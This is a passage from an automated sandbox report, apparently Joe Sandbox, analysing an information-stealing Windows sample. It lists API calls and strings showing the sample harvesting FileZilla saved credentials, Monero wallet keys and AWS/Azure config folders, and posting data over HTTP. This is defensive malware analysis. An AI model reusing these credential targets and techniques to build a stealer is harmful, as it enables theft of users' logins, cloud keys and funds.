                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d79b6e2cb6167a1d97949c6d881b8049bb78e1250ea2623cd3bac9fc9e864bd8
                              • Instruction ID: c3126e4d7a5bf2c466957882a7aad655883d119994dc15c4d06f776afc82ef49
                              • Opcode Fuzzy Hash: d79b6e2cb6167a1d97949c6d881b8049bb78e1250ea2623cd3bac9fc9e864bd8
                              • Instruction Fuzzy Hash: A101A7B214C3089FE349BEA9AC925BBF3DCEB14620F55452ED2C3C3B41FEB565004696
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                                • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                                • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                                • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                                • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                                • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                                • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00FD0DBA,00FD0DB7,00FD0DB6,00FD0DB3), ref: 00FC0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00FC0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 00FC03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00FC0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00FC0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00FC0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00FC0571
                              • lstrcat.KERNEL32(?,url: ), ref: 00FC0580
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC0593
                              • lstrcat.KERNEL32(?,00FD1678), ref: 00FC05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC05B5
                              • lstrcat.KERNEL32(?,00FD167C), ref: 00FC05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 00FC05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC05E6
                              • lstrcat.KERNEL32(?,00FD1688), ref: 00FC05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00FC0604
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC0617
                              • lstrcat.KERNEL32(?,00FD1698), ref: 00FC0626
                              • lstrcat.KERNEL32(?,00FD169C), ref: 00FC0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FD0DB2), ref: 00FC068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 27f05156f611885da1b4626f328ce5d16f4c7d81c747ba9783a6aecb7540f5ca
                              • Instruction ID: 2c96cf21ce0421ebe9e8e8e6242aab719a8f3842629f216167723f19450188cc
                              • Opcode Fuzzy Hash: 27f05156f611885da1b4626f328ce5d16f4c7d81c747ba9783a6aecb7540f5ca
                              • Instruction Fuzzy Hash: 63D13971900109ABCB08EBE0DE96FEE7739BF14300F54452DF116A7185EE78BA46EB61
                              APIs
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                                • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FB59F8
                              • StrCmpCA.SHLWAPI(?,00DEEA08), ref: 00FB5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00DEEA48,00000000,?,00DED6A0,00000000,?,00FD1A1C), ref: 00FB5E71
                              • lstrlen.KERNEL32(00000000), ref: 00FB5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00FB5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FB5E9A
                              • lstrlen.KERNEL32(00000000), ref: 00FB5EAF
                              • lstrlen.KERNEL32(00000000), ref: 00FB5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FB5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00FB5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FB5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00FB5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00FB5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00FB5FBD
                              • HttpOpenRequestA.WININET(00000000,00DEEA18,?,00DEE100,00000000,00000000,00400100,00000000), ref: 00FB5BF8
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • InternetCloseHandle.WININET(00000000), ref: 00FB5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 6b302953b892f4637819de1d7e9636d55161188f10c1451aee31510c67735ea5
                              • Instruction ID: 8dd5eadd603e9e773ec451425dcddd714fb278e9ab83d500a204dbd6ac9050c6
                              • Opcode Fuzzy Hash: 6b302953b892f4637819de1d7e9636d55161188f10c1451aee31510c67735ea5
                              • Instruction Fuzzy Hash: 21120B7182011DABDB18EBA0DD96FEEB338BF14704F4041ADB10A62091EF787A49DF65
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00DED7F0,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBCF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FBD0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FBD0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 00FBD208
                              • lstrcat.KERNEL32(?,00FD1478), ref: 00FBD217
                              • lstrcat.KERNEL32(?,00000000), ref: 00FBD22A
                              • lstrcat.KERNEL32(?,00FD147C), ref: 00FBD239
                              • lstrcat.KERNEL32(?,00000000), ref: 00FBD24C
                              • lstrcat.KERNEL32(?,00FD1480), ref: 00FBD25B
                              • lstrcat.KERNEL32(?,00000000), ref: 00FBD26E
                              • lstrcat.KERNEL32(?,00FD1484), ref: 00FBD27D
                              • lstrcat.KERNEL32(?,00000000), ref: 00FBD290
                              • lstrcat.KERNEL32(?,00FD1488), ref: 00FBD29F
                              • lstrcat.KERNEL32(?,00000000), ref: 00FBD2B2
                              • lstrcat.KERNEL32(?,00FD148C), ref: 00FBD2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 00FBD2D4
                              • lstrcat.KERNEL32(?,00FD1490), ref: 00FBD2E3
                                • Part of subcall function 00FCA820: lstrlen.KERNEL32(00FB4F05,?,?,00FB4F05,00FD0DDE), ref: 00FCA82B
                                • Part of subcall function 00FCA820: lstrcpy.KERNEL32(00FD0DDE,00000000), ref: 00FCA885
                              • lstrlen.KERNEL32(?), ref: 00FBD32A
                              • lstrlen.KERNEL32(?), ref: 00FBD339
                                • Part of subcall function 00FCAA70: StrCmpCA.SHLWAPI(00DE9088,00FBA7A7,?,00FBA7A7,00DE9088), ref: 00FCAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 00FBD3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: ccfeb911a5b38c69af2d9f6ddaa7b08ac4b754a38859da6cb7cdc4a643c8e451
                              • Instruction ID: 0c8a301ba173365d27be06e0d78081be3ba1cbec3709962a40e848a8b311576f
                              • Opcode Fuzzy Hash: ccfeb911a5b38c69af2d9f6ddaa7b08ac4b754a38859da6cb7cdc4a643c8e451
                              • Instruction Fuzzy Hash: A0E13D71910109ABCB18EBA0EE96FEE7378BF54305F10416CF116A7091DE39BE45EB62
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00DEC680,00000000,?,00FD144C,00000000,?,?), ref: 00FBCA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00FBCA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00FBCA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FBCAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00FBCAD9
                              • StrStrA.SHLWAPI(?,00DEC698,00FD0B52), ref: 00FBCAF7
                              • StrStrA.SHLWAPI(00000000,00DEC758), ref: 00FBCB1E
                              • StrStrA.SHLWAPI(?,00DECDB0,00000000,?,00FD1458,00000000,?,00000000,00000000,?,00DE90E8,00000000,?,00FD1454,00000000,?), ref: 00FBCCA2
                              • StrStrA.SHLWAPI(00000000,00DECD70), ref: 00FBCCB9
                                • Part of subcall function 00FBC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FBC871
                                • Part of subcall function 00FBC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FBC87C
                              • StrStrA.SHLWAPI(?,00DECD70,00000000,?,00FD145C,00000000,?,00000000,00DE8FC8), ref: 00FBCD5A
                              • StrStrA.SHLWAPI(00000000,00DE8E38), ref: 00FBCD71
                                • Part of subcall function 00FBC820: lstrcat.KERNEL32(?,00FD0B46), ref: 00FBC943
                                • Part of subcall function 00FBC820: lstrcat.KERNEL32(?,00FD0B47), ref: 00FBC957
                                • Part of subcall function 00FBC820: lstrcat.KERNEL32(?,00FD0B4E), ref: 00FBC978
                              • lstrlen.KERNEL32(00000000), ref: 00FBCE44
                              • CloseHandle.KERNEL32(00000000), ref: 00FBCE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 00af4305355649fb170416991fa31481f2ca5968c7411b3b3dfb3755b3eb232a
                              • Instruction ID: 01c0b1c4cc650ddcdf04610e151e5d69a30fb269f0856e1ee3e655f93b72e9e5
                              • Opcode Fuzzy Hash: 00af4305355649fb170416991fa31481f2ca5968c7411b3b3dfb3755b3eb232a
                              • Instruction Fuzzy Hash: 21E1EA7190010DABDB18EBA0ED96FEEB778AF14304F40416DF10667191EF387A8ADB65
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • RegOpenKeyExA.ADVAPI32(00000000,00DEAAA8,00000000,00020019,00000000,00FD05B6), ref: 00FC83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FC8426
                              • wsprintfA.USER32 ref: 00FC8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FC847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC8499
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 0ff311b843c2e9362e18405ba22cb39c948d7cec5a6574c88e31aad67374d1f3
                              • Instruction ID: 2d0839f1ac47048e90e41959b299d8701b6f9a1f6ef9b0de5b88adbc9148c2cd
                              • Opcode Fuzzy Hash: 0ff311b843c2e9362e18405ba22cb39c948d7cec5a6574c88e31aad67374d1f3
                              • Instruction Fuzzy Hash: 4981297191011DABDB28DB50DD96FEAB7B8BF08704F00829DE10AA7180DF756E86DF90
                              APIs
                                • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00FC4DCD
                                • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC492C
                                • Part of subcall function 00FC4910: FindFirstFileA.KERNEL32(?,?), ref: 00FC4943
                              • lstrcat.KERNEL32(?,00000000), ref: 00FC4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00FC4E59
                                • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FDC), ref: 00FC4971
                                • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FE0), ref: 00FC4987
                                • Part of subcall function 00FC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FC4B7D
                                • Part of subcall function 00FC4910: FindClose.KERNEL32(000000FF), ref: 00FC4B92
